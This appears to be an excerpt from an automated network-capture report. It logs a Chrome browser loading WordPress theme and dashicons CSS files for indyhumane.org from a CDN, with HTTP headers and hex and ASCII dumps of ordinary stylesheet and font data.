                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC403INData Raw: 2f 2a 0a 54 68 65 6d 65 20 4e 61 6d 65 3a 20 49 6e 64 79 20 48 75 6d 61 6e 65 20 42 61 73 65 64 20 6f 6e 20 54 68 72 69 76 65 0a 54 68 65 6d 65 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 74 68 72 69 76 65 74 68 65 6d 65 73 2e 63 6f 6d 2f 0a 56 65 72 73 69 6f 6e 3a 20 31 2e 30 0a 41 75 74 68 6f 72 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 72 69 76 65 74 68 65 6d 65 73 2e 63 6f 6d 22 3e 54 68 72 69 76 65 20 54 68 65 6d 65 73 3c 2f 61 3e 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 46 75 6c 6c 79 20 63 75 73 74 6f 6d 69 7a 61 62 6c 65 2c 20 66 72 6f 6e 74 20 65 6e 64 20 74 68 65 6d 65 20 61 6e 64 20 74 65 6d 70 6c 61 74 65 20 65 64 69 74 69 6e 67 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 20 68 61 73 20 61 72 72 69 76 65 64 21 20 0a 54
                                                                                                                                                                                                                                                        Data Ascii: /*Theme Name: Indy Humane Based on ThriveTheme URI: http://thrivethemes.com/Version: 1.0Author: <a href="http://www.thrivethemes.com">Thrive Themes</a>Description: Fully customizable, front end theme and template editing for WordPress has arrived! T


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        4192.168.2.449747192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC584OUTGET /wp-includes/css/dashicons.min.css?ver=6.7.1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:09 GMT
                                                                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                                                                        Content-Length: 59016
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/css/dashicons.min.css>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Wed, 03 Mar 2021 21:16:22 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC758INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 64 61 73 68 69 63 6f 6e 73 3b 73 72 63 3a 75 72 6c 28 22 2e 2e 2f 66 6f 6e 74 73 2f 64 61 73 68 69 63 6f 6e 73 2e 65 6f 74 3f 39 39 61 63 37 32 36 32 32 33 63 37 34 39 34 34 33 62 36 34 32 63 65 33 33 64 66 38 62 38 30 30 22 29 3b 73 72 63 3a 75 72 6c 28 22 2e 2e 2f 66 6f 6e 74 73 2f 64 61 73 68 69 63 6f 6e 73 2e 65 6f 74 3f 39 39 61 63 37 32 36 32 32 33 63 37 34 39 34 34 33 62 36 34 32 63 65 33 33 64 66 38 62 38 30 30 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 75 72 6c 28 22 64 61 74 61 3a 61 70 70 6c 69 63 61 74 69
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated */@font-face{font-family:dashicons;src:url("../fonts/dashicons.eot?99ac726223c749443b642ce33df8b800");src:url("../fonts/dashicons.eot?99ac726223c749443b642ce33df8b800#iefix") format("embedded-opentype"),url("data:applicati
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 41 43 67 4c 53 58 46 4d 59 48 44 34 79 66 48 56 6e 41 6e 48 31 6d 42 67 5a 47 49 45 30 43 44 4d 41 41 49 2f 7a 43 47 6c 34 6e 4e 33 59 39 33 2f 65 56 52 6e 47 38 63 2f 39 4a 45 32 62 73 74 4c 64 51 49 46 30 4e 38 78 30 74 38 77 30 70 53 4d 74 30 42 5a 4b 53 35 6d 6c 37 46 33 32 6c 72 4c 33 68 6c 4b 6d 43 78 45 51 74 7a 6a 41 68 51 4d 52 52 63 45 4a 69 6a 68 51 51 57 56 34 76 67 4e 42 47 56 34 6e 6c 33 2b 42 2f 6d 62 54 64 38 2b 72 65 65 56 4a 76 75 63 38 35 39 7a 6e 76 67 4c 30 41 35 70 6b 4f 32 6e 57 33 78 63 4a 38 71 65 65 30 32 65 6a 37 2f 4e 4e 44 4f 7a 37 66 48 50 54 77 2f 72 2f 4c 6e 54 6f 36 30 61 6c 65 34 6f 6f 57 6f 76 32 6f 72 4f 59 58 58 51 58 50 57 56 72 32 56 35 32 6c 72 50 4c 33 71 71 33 57 6c 6d 74 71 6c 5a 58 78 31 62 6e 56 46 64 56 64 39
                                                                                                                                                                                                                                                        Data Ascii: ACgLSXFMYHD4yfHVnAnH1mBgZGIE0CDMAAI/zCGl4nN3Y93/eVRnG8c/9JE2bstLdQIF0N8x0t8w0pSMt0BZKS5ml7F32lrL3hlKmCxEQtzjAhQMRRcEJijhQQWV4vgNBGV4nl3+B/mbTd8+reeVJvuc859znvgL0A5pkO2nW3xcJ8qee02ej7/NNDOz7fHPTw/r/LnTo60ale4ooWov2orOYXXQXPWVr2V52lrPL3qq3WlmtqlZXx1bnVFdVd9
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 53 5a 4e 4d 74 5a 58 55 61 65 51 35 62 6d 4f 71 74 36 52 74 54 5a 57 58 74 4a 32 70 42 70 4f 32 4e 31 56 6a 30 67 36 6d 75 6b 7a 61 30 56 53 68 53 56 32 6d 57 6b 32 61 62 4b 72 61 70 43 6c 47 76 74 75 6d 57 75 53 31 6d 6d 62 6b 4e 5a 35 75 35 48 57 64 59 65 51 31 6d 32 6d 71 2b 4b 52 5a 52 6c 37 76 32 55 5a 2b 39 70 31 4d 39 77 46 70 5a 39 50 4e 51 4e 72 46 64 45 65 51 64 6a 58 64 46 71 54 64 54 50 63 47 61 58 66 54 44 55 4c 71 4e 76 4b 36 7a 6a 48 79 2b 76 55 59 65 64 35 7a 6a 62 77 65 65 35 6a 75 48 4e 49 38 49 2b 2b 66 2b 63 61 39 47 68 65 59 62 69 54 53 51 69 4f 66 70 31 37 54 4c 55 56 61 5a 4c 71 76 53 49 74 4e 4e 78 64 70 54 39 4d 64 52 74 72 4c 64 4a 75 52 39 6a 61 65 31 72 6a 45 49 75 2f 74 70 52 5a 35 2f 79 36 7a 79 48 50 5a 78 79 4c 76 6b 58 32
                                                                                                                                                                                                                                                        Data Ascii: SZNMtZXUaeQ5bmOqt6RtTZWXtJ2pBpO2N1Vj0g6mukza0VShSV2mWk2abKrapClGvtumWuS1mmbkNZ5u5HWdYeQ1m2mq+KRZRl7v2UZ+9p1M9wFpZ9PNQNrFdEeQdjXdFqTdTPcGaXfTDULqNvK6zjHy+vUYed5zjbwee5juHNI8I++f+ca9GheYbiTSQiOfp17TLUVaZLqvSItNNxdpT9MdRtrLdJuR9jae1rjEIu/tpRZ5/y6zyHPZxyLvkX2
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 47 64 5a 61 36 45 39 56 35 31 69 53 70 4e 55 70 78 71 36 64 36 76 54 54 41 6d 54 36 6e 52 54 31 71 51 36 77 35 51 6e 71 63 34 30 35 55 2b 71 73 77 79 39 6c 39 58 5a 46 6a 6f 37 31 54 6d 6d 64 45 71 31 7a 70 52 54 71 53 34 79 38 6a 70 64 62 4c 79 69 38 52 4b 4c 76 50 36 58 6d 76 49 73 31 57 58 47 4f 78 6f 76 4e 32 56 63 71 69 74 4d 61 5a 66 71 53 75 4d 6c 6a 56 65 5a 45 6a 44 56 6a 61 59 73 54 48 57 54 4b 52 56 54 33 57 7a 4b 78 31 53 33 6d 4a 49 79 31 61 33 57 4e 38 66 62 54 4f 6d 5a 61 72 30 70 52 31 50 64 62 6b 72 55 56 42 74 4d 32 5a 72 71 44 6c 50 4b 7a 74 64 6c 48 2b 56 74 36 6a 41 6c 62 2b 71 47 38 61 37 47 4a 6c 4d 61 70 32 34 32 35 58 4c 71 46 6b 4e 39 52 74 33 66 6c 4e 57 70 42 35 68 53 4f 33 57 72 4b 62 39 54 74 35 6d 53 50 50 55 67 55 36 61 6e
                                                                                                                                                                                                                                                        Data Ascii: GdZa6E9V51iSpNUpxq6d6vTTAmT6nRT1qQ6w5Qnqc405U+qswy9l9XZFjo71TmmdEq1zpRTqS4y8jpdbLyi8RKLvP6XmvIs1WXGOxovN2VcqitMaZfqSuMljVeZEjDVjaYsTHWTKRVT3WzKx1S3mJIy1a3WN8fbTOmZar0pR1PdbkrUVBtM2ZrqDlPKztdlH+Vt6jAlb+qG8a7GJlMap2425XLqFkN9Rt3flNWpB5hSO3WrKb9Tt5mSPPUgU6an
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 35 4f 54 76 7a 32 50 78 63 74 58 2f 78 4f 30 66 54 56 5a 30 56 49 38 6f 36 66 57 49 62 37 46 74 7a 6a 68 57 65 74 79 69 72 36 39 33 41 50 33 4b 6a 6a 5a 38 32 31 73 76 6c 73 6e 70 77 59 78 76 68 4c 2f 31 7a 30 54 59 52 70 47 4e 46 55 54 39 65 58 5a 37 64 57 53 4c 45 35 57 76 5a 72 36 42 70 6a 4d 33 6c 6d 69 65 6c 41 2f 37 52 62 7a 57 55 55 31 6e 43 74 4b 73 43 49 39 4b 4c 4b 5a 69 66 63 39 42 79 68 32 6d 78 31 2f 4d 69 4b 49 39 45 6d 4e 41 2b 47 37 70 71 63 6f 70 36 68 4c 46 66 37 31 57 58 5a 4d 47 54 45 4b 4d 59 77 31 32 69 30 6d 38 33 52 67 49 53 42 67 48 76 39 4b 49 34 64 58 70 47 4e 4b 44 4a 6b 4f 42 69 66 62 4c 62 4a 58 65 48 34 4c 2b 6e 64 37 4c 76 65 6c 58 75 45 78 71 42 59 55 6a 7a 4a 30 47 38 79 50 4b 50 41 44 48 4f 5a 48 49 7a 32 42 72 50 49 51
                                                                                                                                                                                                                                                        Data Ascii: 5OTvz2PxctX/xO0fTVZ0VI8o6fWIb7FtzjhWetyir693AP3KjjZ821svlsnpwYxvhL/1z0TYRpGNFUT9eXZ7dWSLE5WvZr6BpjM3lmielA/7RbzWUU1nCtKsCI9KLKZifc9Byh2mx1/MiKI9EmNA+G7pqcop6hLFf71WXZMGTEKMYw12i0m83RgISBgHv9KI4dXpGNKDJkOBifbLbJXeH4L+nd7LvelXuExqBYUjzJ0G8yPKPADHOZHIz2BrPIQ
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 69 79 49 6f 46 51 30 75 72 43 50 45 34 6c 54 4a 56 68 44 6d 66 46 77 73 5a 53 38 37 5a 58 41 6c 61 53 34 42 4c 4c 4d 65 37 37 78 51 4d 53 59 59 73 44 46 37 55 65 46 62 69 42 4d 6e 7a 63 78 35 62 39 46 52 58 46 36 44 41 64 55 38 78 70 41 61 30 39 74 71 57 5a 54 70 74 61 45 35 72 72 6b 33 54 54 49 59 70 41 4b 31 59 59 4e 5a 67 44 4a 35 67 64 70 6a 7a 7a 43 35 7a 6b 58 6d 59 65 59 78 35 41 2f 50 4d 44 57 33 4e 52 35 35 66 61 33 62 62 4d 4c 49 41 58 76 6d 31 64 75 6a 57 79 46 67 6a 49 59 5a 76 4a 50 69 52 57 32 76 36 70 41 6c 44 57 45 4c 4a 39 44 2b 4e 34 41 42 58 79 48 55 59 70 50 43 47 45 4c 6f 4a 51 70 4b 53 67 6c 4f 34 6b 7a 79 4a 35 35 70 36 2f 4e 64 6e 6b 64 67 31 76 74 69 30 52 56 36 56 32 4d 64 71 74 77 75 69 33 58 79 4d 6c 5a 70 6e 4f 61 4d 72 42 6f
                                                                                                                                                                                                                                                        Data Ascii: iyIoFQ0urCPE4lTJVhDmfFwsZS87ZXAlaS4BLLMe77xQMSYYsDF7UeFbiBMnzcx5b9FRXF6DAdU8xpAa09tqWZTptaE5rrk3TTIYpAK1YYNZgDJ5gdpjzzC5zkXmYeYx5A/PMDW3NR55fa3bbMLIAXvm1dujWyFgjIYZvJPiRW2v6pAlDWELJ9D+N4ABXyHUYpPCGELoJQpKSglO4kzyJ55p6/Ndnkdg1vti0RV6V2Mdqtwui3XyMlZpnOaMrBo
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 4e 63 70 61 51 4e 4f 79 51 71 5a 48 69 7a 70 35 5a 6a 68 35 70 67 73 64 32 6b 33 79 50 64 77 66 41 5a 4f 79 44 2b 68 6b 66 50 55 4b 35 44 4b 58 78 2f 54 2b 42 74 77 66 77 74 30 75 66 4e 48 42 66 6d 76 36 77 4c 57 6f 46 54 47 76 58 6a 39 61 4c 38 69 6d 46 6c 47 49 48 5a 65 76 42 2b 48 68 6f 4e 64 4c 79 72 67 66 44 59 64 2f 52 39 31 63 30 71 6f 44 57 71 38 6f 61 64 6f 6a 2f 52 44 6a 70 46 39 44 50 38 65 59 77 46 76 64 78 7a 77 4b 4a 52 5a 71 4d 4f 58 4a 4b 68 37 42 45 67 2f 54 72 4e 75 4d 75 58 2f 41 63 51 6e 50 47 77 4a 4d 41 6f 71 36 65 51 59 52 38 74 74 75 77 56 69 76 45 61 4c 68 52 49 43 61 59 4b 44 44 4e 65 78 57 41 51 48 34 72 75 4e 31 58 55 39 6e 41 52 47 32 57 2b 6a 44 64 39 37 2f 6c 73 73 70 6a 6c 31 36 2b 76 6a 71 67 77 30 65 4c 36 64 44 49 34 56
                                                                                                                                                                                                                                                        Data Ascii: NcpaQNOyQqZHizp5Zjh5pgsd2k3yPdwfAZOyD+hkfPUK5DKXx/T+Btwfwt0ufNHBfmv6wLWoFTGvXj9aL8imFlGIHZevB+HhoNdLyrgfDYd/R91c0qoDWq8oadoj/RDjpF9DP8eYwFvdxzwKJRZqMOXJKh7BEg/TrNuMuX/AcQnPGwJMAoq6eQYR8ttuwVivEaLhRICaYKDDNexWAQH4ruN1XU9nARG2W+jDd97/lsspjl16+vjqgw0eL6dDI4V
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 6b 6f 48 5a 69 64 43 74 5a 74 67 53 41 4c 75 6e 47 36 7a 31 67 46 63 41 6f 38 43 68 69 51 55 58 67 42 53 48 54 6b 45 56 61 49 6e 4b 32 6d 50 30 31 53 64 38 31 32 6c 6f 65 31 6f 57 74 72 51 39 65 65 30 68 76 49 52 54 2b 66 47 2f 7a 4d 53 54 45 36 37 79 2b 51 63 51 58 69 4f 31 79 58 2b 4f 55 46 62 6d 6b 51 35 2f 52 4d 51 6b 59 58 6e 42 44 33 46 76 56 6b 57 52 62 47 34 34 4b 51 6b 76 5a 37 56 42 45 74 6b 46 63 57 74 42 2f 55 73 53 6e 4e 65 6b 45 32 70 6c 75 75 6e 64 58 30 48 4f 41 44 48 41 47 37 67 4c 5a 72 32 4d 55 37 58 54 37 52 34 58 72 76 50 46 50 51 58 42 49 31 37 71 36 42 71 33 48 4d 43 57 68 4c 49 67 63 59 76 76 4a 56 58 39 4e 52 62 67 48 67 62 62 35 62 74 70 62 79 49 46 55 6b 4c 6d 70 71 41 6a 61 4c 69 70 6f 4e 63 59 34 59 72 2f 6a 58 30 6a 55 41 6b
                                                                                                                                                                                                                                                        Data Ascii: koHZidCtZtgSALunG6z1gFcAo8ChiQUXgBSHTkEVaInK2mP01Sd812loe1oWtrQ9ee0hvIRT+fG/zMSTE67y+QcQXiO1yX+OUFbmkQ5/RMQkYXnBD3FvVkWRbG44KQkvZ7VBEtkFcWtB/UsSnNekE2pluundX0HOADHAG7gLZr2MU7XT7R4XrvPFPQXBI17q6Bq3HMCWhLIgcYvvJVX9NRbgHgbb5btpbyIFUkLmpqAjaLipoNcY4Yr/jX0jUAk
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 75 75 61 63 6a 4a 38 62 32 50 4b 49 59 70 48 77 33 4d 2f 4c 70 2b 78 76 52 39 63 33 65 58 68 47 66 30 39 65 4f 65 72 36 57 77 78 41 6b 43 4a 2b 47 55 74 76 6f 57 49 57 57 78 41 44 37 38 58 6e 34 39 6c 31 76 50 39 33 7a 46 6b 6c 68 52 53 67 6b 7a 33 6f 4f 73 6f 7a 35 54 59 39 61 4a 6c 48 6b 69 52 32 35 53 34 67 48 77 32 73 47 55 33 76 41 56 45 74 59 71 46 48 62 50 78 78 4e 71 42 44 64 43 53 48 69 4d 4c 6e 30 44 75 6e 54 46 39 44 78 7a 6b 66 58 4d 77 50 54 59 52 54 67 5a 2f 2b 38 35 49 58 4b 64 4b 46 41 4d 35 54 6f 4a 74 79 6d 56 79 53 65 33 35 75 45 45 39 61 43 78 4d 45 38 71 78 57 50 53 64 6e 46 44 39 75 4c 44 72 75 45 5a 6b 34 73 51 6e 66 41 4d 41 36 69 48 44 72 32 2f 79 70 78 6d 7a 6a 4c 6e 6d 54 75 5a 48 68 30 44 7a 58 55 4b 35 39 78 6b 4a 4d 79 66 70
                                                                                                                                                                                                                                                        Data Ascii: uuacjJ8b2PKIYpHw3M/Lp+xvR9c3eXhGf09eOer6WwxAkCJ+GUtvoWIWWxAD78Xn49l1vP93zFklhRSgkz3oOsoz5TY9aJlHkiR25S4gHw2sGU3vAVEtYqFHbPxxNqBDdCSHiMLn0DunTF9DxzkfXMwPTYRTgZ/+85IXKdKFAM5ToJtymVySe35uEE9aCxME8qxWPSdnFD9uLDruEZk4sQnfAMA6iHDr2/ypxmzjLnmTuZHh0DzXUK59xkJMyfp
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 66 78 4f 5a 6c 69 37 2f 4b 4e 4a 67 31 71 6d 2b 50 70 32 49 4e 2b 79 34 4f 32 39 32 77 47 75 75 6d 43 42 74 41 46 6b 38 43 43 72 73 41 39 53 69 41 61 61 49 44 7a 63 6f 6f 51 64 70 65 4e 49 4d 67 76 65 7a 61 32 59 79 4d 4a 5a 46 33 38 35 58 31 7a 51 76 62 4a 66 4f 67 48 71 71 4e 56 6b 4d 4e 37 39 30 70 65 30 56 64 35 46 49 72 6c 56 34 2b 33 36 75 73 70 44 68 44 6c 55 77 74 59 2b 31 67 34 42 56 30 6a 4e 47 4c 4a 2b 38 35 64 75 79 2b 34 7a 50 35 33 4b 38 79 41 5a 55 55 45 39 6b 4b 6e 71 41 65 4b 4d 4d 57 6f 6e 70 63 57 6c 4c 43 53 34 66 54 34 6c 77 38 48 67 54 48 31 32 46 39 53 2f 6d 46 34 6e 4a 59 44 4a 65 4c 42 54 38 6c 4f 4f 34 37 46 2b 46 76 55 68 62 45 39 4f 72 31 6e 75 6f 37 44 58 2b 62 5a 49 37 67 4b 32 7a 37 44 63 63 58 30 6f 75 4c 2f 2b 65 6b 47 4e
                                                                                                                                                                                                                                                        Data Ascii: fxOZli7/KNJg1qm+Pp2IN+y4O292wGuumCBtAFk8CCrsA9SiAaaIDzcooQdpeNIMgveza2YyMJZF385X1zQvbJfOgHqqNVkMN790pe0Vd5FIrlV4+36uspDhDlUwtY+1g4BV0jNGLJ+85duy+4zP53K8yAZUUE9kKnqAeKMMWonpcWlLCS4fT4lw8HgTH12F9S/mF4nJYDJeLBT8lOO47F+FvUhbE9Or1nuo7DX+bZI7gK2z7DccX0ouL/+ekGN


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        5192.168.2.449746192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC620OUTGET /wp-content/themes/thrive-theme/inc/assets/dist/landingpage-front.css?ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:09 GMT
                                                                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                                                                        Content-Length: 723
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/themes/thrive-theme/inc/assets/dist/landingpage-front.css>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 17:13:47 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC723INData Raw: 62 6f 64 79 2e 74 63 62 2d 66 75 6c 6c 2d 74 6f 70 20 2e 6c 61 6e 64 69 6e 67 70 61 67 65 2d 73 65 63 74 69 6f 6e 2c 62 6f 64 79 2e 74 63 62 2d 66 75 6c 6c 2d 62 6f 74 74 6f 6d 20 2e 6c 61 6e 64 69 6e 67 70 61 67 65 2d 73 65 63 74 69 6f 6e 7b 77 69 64 74 68 3a 31 30 30 76 77 3b 6c 65 66 74 3a 35 30 25 3b 72 69 67 68 74 3a 35 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 30 76 77 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 35 30 76 77 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 61 6e 64 69 6e 67 70 61 67 65 2d 73 65 63 74 69 6f 6e 7b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 31 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62
                                                                                                                                                                                                                                                        Data Ascii: body.tcb-full-top .landingpage-section,body.tcb-full-bottom .landingpage-section{width:100vw;left:50%;right:50%;margin-left:-50vw !important;margin-right:-50vw !important}.landingpage-section{flex-shrink:1;position:relative;margin:0;padding:0;box-sizing:b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        6192.168.2.449749192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC592OUTGET /wp-content/themes/thrive-theme/style.css?ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC618INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:09 GMT
                                                                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                                                                        Content-Length: 18512
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/themes/thrive-theme/style.css>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 17:13:47 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
